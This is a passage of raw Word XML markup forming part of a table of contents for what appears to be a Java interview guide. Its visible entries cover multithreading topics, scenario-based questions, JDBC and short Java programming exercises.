            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>417</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47AEB793" w14:textId="1AB695A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6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synchronized in multithreading?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307769 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>419</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14C559FF" w14:textId="7600336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7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Thread safety with Singleton class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307770 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>421</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="721A4C13" w14:textId="6B08B74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7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Thread executors?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307771 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>424</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75E556D5" w14:textId="1878178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7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create three threads so that it will execute simultaneously?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307772 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>426</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A4112CD" w14:textId="0A758F6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7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can we replace instead of this keyword in the statement? synchronized(this) {?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307773 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>428</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D7B3231" w14:textId="5E7A237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7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runAsync vs supplyAsync?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307774 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A41550B" w14:textId="5941AA6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7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ReentrantLock in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307775 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>430</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67687FA1" w14:textId="2602EC1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7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lock and synchronized?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307776 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>431</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EF52E43" w14:textId="04E864D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7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Callable interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307777 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>433</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EFC93F7" w14:textId="28B3219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7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Runnable interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307778 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>434</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AC5131F" w14:textId="7801587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7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Future and CompletableFuture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307779 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>434</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="457B3C11" w14:textId="0FD161F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8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Semaphore?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307780 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>436</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23BC2DAC" w14:textId="410A907B" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307781" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scenario based Questions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307781 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>439</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0530DCA1" w14:textId="66702DD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8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Scenario based question - 1?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307782 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>439</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E8CC85B" w14:textId="2AAE4DE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8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Scenario based question - 2?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307783 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>439</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39EF29EB" w14:textId="12C1344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8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Scenario based question - 3?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307784 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>440</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2727F490" w14:textId="25B3BB5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8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Scenario based question - 4?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307785 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>440</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42DE0A22" w14:textId="434C257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8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Scenario based question - 5?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307786 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>441</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B37A1AD" w14:textId="27BFD876" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307787" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>JDBC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307787 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>445</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00425633" w14:textId="7A015A0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8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JDBC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307788 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>445</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BF188AB" w14:textId="79AF478A" w:rsidR="00012799" w:rsidRDefault="00012799">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307789" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java Programs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307789 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>446</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C14CD0E" w14:textId="5F1FE1F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9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Find max sum of contiguous sub array</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307790 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>446</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="550B7E7F" w14:textId="1EFBA88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91" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cstheme="minorHAnsi"/>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Print even and odd numbers using thread</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307791 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>446</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3500B8B0" w14:textId="762EC6A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9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Find maximum value from integer array</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
